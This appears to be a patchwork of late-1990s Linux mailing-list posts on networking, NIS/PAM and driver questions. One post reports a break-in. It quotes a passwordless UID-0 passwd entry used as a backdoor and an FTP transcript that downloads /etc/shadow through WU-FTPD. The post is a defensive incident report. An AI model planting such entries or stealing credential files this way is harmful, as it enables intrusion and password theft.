Are you the same guy that I've been talking to already?

The EtherEZ has an SMC Ultra compatibility mode. Use the dos utility on
the driver floppy to reconfigure the board, and put it in that mode. Use
the SMC Ultra driver.

Hi,

I need to recompile my 2.1.117 kernel and assign a range of ip address to an
interface. How can I do that ? What's the kernel hack ?

Example: eth0: 10.0.0.1 to 10.0.0.254

Thank you to answer me also by email

My name is Thorsten, not Thomas ;-)

Sorry that I haven't answerd, I have lost some mail by my move to a new city.

This is a FAQ and I should add it to the NIS-Howto. Or even better, RedHat should
fix it. Change your PAM configuration to use NOT use pam_pwdb, but pam_unix_auth.
Read the Section in the NIS-Howto about PAM, NIS+ and login about that.

Use only compat, not files. Read man nsswitch

This is correct.

If +user works, but not +@netgroup, you haven't removed pam_pwdb from all places.
This is a typcally pam_pwdb problem.

Does all 3 netgroup maps exists and readable ? I hope you doesn't use
shadow over NIS ? And haven't configured ypserv to use port auth ?

You also have to add a route (because of the "picky Microsoft DHCP client").
If your Network card is eth0, it would be:

route add -host 255.255.255.255 eth0

In RedHat, I recomend adding that line to your /etc/rc.d/rc.local file.

Subject: Can you wildcard in the /etc/hosts file?
Date: Fri, 15 Jan 1999 21:09:57 GMT

I have a network consisting of two NT boxes and two Linix boxes (one Debian,
and the other LRP). I do not have a DNS setup, I connect to the Linix boxes
by specifying their IP addresses.

My problem is that I can only FTP or Telnet to these boxes if the computer I'm
trying to connect with is listed in the /etc/hosts file. (IE, if an NT box is
192.168.1.4, this needs to be in the Linix boxes' /etc/hosts files).

So I'm wondering how I can connect to the linix box without specifying my
entire network in the /etc/hosts file. Is it possible to wildcard it? I'd
really like to avoid setting up a DNS if I can.

Also, how would I go about allowing any computer on any network to connect to
one of the linix boxes?

Thanks,

Aaron

Ummm, I haven't done this in a long time, but you don't use the routing
table to make masquerading work.
You use the ipfwdadm utility, although I know they've changed the name of
it, and I don't know what it's called now. It's like ipchains or something
like that.

When you figure out what ipfwdadm/ipchains commands to use, you put them
somewhere in your rc.* files, probably near the networking stuff, after the
interface is initialized. Then you don't have to do it at boot up each time.
Sorry to be so vague, but It's been a long time since I did this myself.

Subject: Arcserve Agent on Linux

I am using the the Arcserve agent on Linux to backup to a tape drive on
an NT server running Arcserve 6.0. Backup and restore works quite fine.

There are two small quirks though.

1) After backup, full verification works. But CRC verification fails.
I've tried it both ways.
Not a big deal, but I'm interested to know why.

2) Also, I sometimes get the following error messages when backup the
Linux server:
AE9110 Unknown filter type - 5

I'm pretty sure I configured uagent properly:
uag.cntl specifies
/proc
/dev
/home
so those directories are not backed up

There's nothing in uag.conf because the defaults were acceptable; and I
couldn't find
anything in fs.cntl that was relevant.
Cheyenne has no information on this error message.

It still backs up, but I'm left wondering.

TIA for any info.

I don't know much, but while I'm here, I thought I'd throw in my two cents.
IPX isn't routable. So you have to run IPX on some routable protocol (like
ip)
Novell is moving towards this from what I hear, maybe version 5 has it
already, I dunno.
Since samba runs like windows for workgroups over IP, you can thereby route
ms networking packets this way. I've heard that it's been done, never did it
myself. Kinda neat, that you can mount samba drives over a modem.
Anyway, perhaps think about NFS? Can you NFS export Novell drives? That
would solve your problem as well, no?

We had a hacker exploit a weakness in the WU-FTP daemon last night. The
exploit on a machine named "bob" from a machine named "neale"went like
this:

Here's how part of the exploit happened:

By adding an entry to the bottom of the passwd file:
test::0:0:dummyname:/:/bin/bash

without a password marker, our login scripts will not let you login with
a
shell, but they will let you open an ftp connection with root
permissions.

You can then upload or download any file you want. ftp will allow you to

login with a null password so you do not need access to the shadow file
to
exploit this weakness, as the following transcript will show:

neale[29]% ftp bob
Connected to bob....
220 bob... FTP server (Version wu-2.4.2-academ[BETA-15](1) Sat Nov
1 03:08:32 EST 1997) ready.

Password:
230 User test logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /etc/
250 CWD command successful.
ftp> get shadow
local: shadow remote: shadow
200 PORT command successful.
150 Opening BINARY mode data connection for shadow (1117 bytes).
226 Transfer complete.

ftp> bye
221 Goodbye.
neale[30]% whoami
dniederm
neale[31]% more shadow
...
the contents of the shadow file including encrypted passwords would
follow.

The fact that the shadow file is not root writable. Would not have saved
it. Once root access is gained in this way, putting the shadow file back
raises not problems with overwriting a file with 0400 permissions.
Upgrading to BETA-18 (the latest available rpm still permitted this
exploit. The software was installed as part of the default set of rpms
in a Redhat Linux 5.0 distribution.

We are still working to uncover how the hacker managed to append a
passwd entry to the /etc/passwd file. (I'm open to suggestions--at the
time of the attack, bob was set up to be an NFS client but we do not use
NFS in our domain as so it may not have been configured properly. NFS
has since been removed).

We have since replaced wu-ftp with a different ftp server. Here again I
am open to suggestions as to the best low-cost (or no-cost) ftpd
available apart from wu-ftp.

for a week now. The card is detected at boot time but I just could not
connect to any place. When I do a telnet, it complains about Host Name
Lookup failed. I know it has to do with the DNS servers so I put in
        nameserver xxx.xxx.xxx.x
        nameserver xxx.xxx.xxx.x
entries into resolv.conf After that when I do a telnet or trying to
connect to Internet, it will wait for maybe a minute before complaining
Host Name Lookup failed. Any ideas what might be wrong?

Another question. What exactly is DHCP and do I have to specify name
servers, routes, gateway and IP information when I'm using DHCP?

Does anyone out there knows any site that has the newest pre-compiled
module, 3c59x.o, for RH 5.2. I tried to compile 3c59x.c myself but hey
it gives a few compiling errors. Thanks in advance.
